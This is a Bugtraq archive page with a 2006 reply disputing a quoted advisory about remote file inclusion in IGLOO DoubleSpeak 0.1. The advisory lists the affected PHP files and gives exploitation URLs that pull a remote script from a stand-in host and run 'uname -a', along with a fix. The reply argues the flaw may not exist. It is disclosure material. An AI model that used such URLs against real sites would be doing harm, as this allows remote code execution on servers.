Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: igloo DoubleSpeak v 0.1 Multiple remote file inclusion

From: str0ke <str0ke () milw0rm com>
Date: Mon, 12 Jun 2006 12:56:22 -0500
R@1D3N,

require "config.inc";  contains   'private' =>
'/www/mrpenguin.org/devel/private',

So this shouldn't be vulnerable.  Missing something?

/str0ke

On 11 Jun 2006 20:47:48 -0000, aminrayden () yahoo com
<aminrayden () yahoo com> wrote:

igloo DoubleSpeak v 0.1 Multiple remote file inclusion

-----------------------------------------------------

Aria-security.com advisory

Bug Discovered by R@1D3N (amin emami)

Original Advisory:http://www.aria-security.net/advisory/igloo/doublespeak.txt

email:AminRayden () yahoo com

Date:12/06/2006

-----------------------------------------------------

Affected software description:

IGLOO DoubleSpeak <= 0.1

Vendor:http://sourceforge.net/projects/iglooweb/

Vulnerability:Multiple remote file inclusion

-----------------------------------------------------

Summary:

DoubleSpeak, formerly known as the Igloo Weblog,

aims to be the easiest to use and most customizable CMS (content management system) on the Internet.

-----------------------------------------------------

Vulnerable code:

require "config.inc";



require "$config[private]/local.inc";

-----------------------------------------------------

Proof of concept:

The problem exists is in the below files when used the variable $config[private]  in a require() function without being 
Declared

index.php

faq.php

hardware.php

ianal.php

links.php

login.php

logout.php

new_stories.php

old.php

poll.php

rtfm.php

software.php

TODO.php

/admin/add_links.php

/admin/add_story.php

/admin/add_poll.php

/admin/index.php

/admin/view_story_queue.php

/ui/create_acct.php

/ui/submit_story.php

/ui/suggest_poll.php

/ui/suggest_topic.php

/ui/vote_on_polls.php

-----------------------------------------------------

Exploitation example:

http://www.r0x3d.com/[igloo_Path]/html/index.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a

http://www.r0x3d.com/[igloo_Path]/html/faq.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a

http://www.r0x3d.com/[igloo_Path]/html/hardware.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a

...


-----------------------------------------------------

Fix:

turn off register_globals and add this code before vulnerable code

$config[private] = "./";


===========================

Aria Security Research

Http://www.aria-security.net
Previous By Date Next
Previous By Thread Next

Current thread: